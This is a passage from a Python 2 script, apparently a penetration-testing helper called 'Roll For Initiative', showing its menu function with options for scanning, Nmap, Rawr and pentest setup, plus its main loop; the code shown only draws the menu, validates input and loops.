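    cleared once it has been shown.  An entry that is not one of "1".."4"
    clears the screen, stores the notice in `message` and returns, so the
    caller's loop redraws the menu with it instead of recursing.
    """
    global message
    print("==========================================================")
    print("Roll For Initiative")
    print("By: @Sw4mp_f0x")
    print("==========================================================")
    print("")

    # Check for message, print message if present, clear out message
    if check:
        print(check)
        print("")
        message = ""

    print("Roll For Initiative Options:")
    print(" [1] Kickoff Scans")
    print(" [2] Web Interface Scan + Rawr")
    print(" [3] Nmap Service Scan")
    print(" [4] Pentest Setup")
    print("")
    selection = raw_input("Please select an option: ")
    try:
        # Only the four listed options exist; the previous 1..5 range let
        # "5" through to a KeyError in execute().
        if selection not in ("1", "2", "3", "4"):
            raise ValueError("Invalid selection: %r" % (selection,))
        execute(selection)
    except ValueError:
        os.system("clear")
        message = "Invalid entry. Pick again."


if __name__ == "__main__":
    LiveHostCount = 0
    rawr_folder = "/root/tools/rawr/rawr.py"
    cmd_path = ""
    message = ""
    setup()

    try:
        while True:
            main_menu(message)
            os.system("clear")
    except KeyboardInterrupt:
        print("Later!")

--------------------------------------------------------------------------------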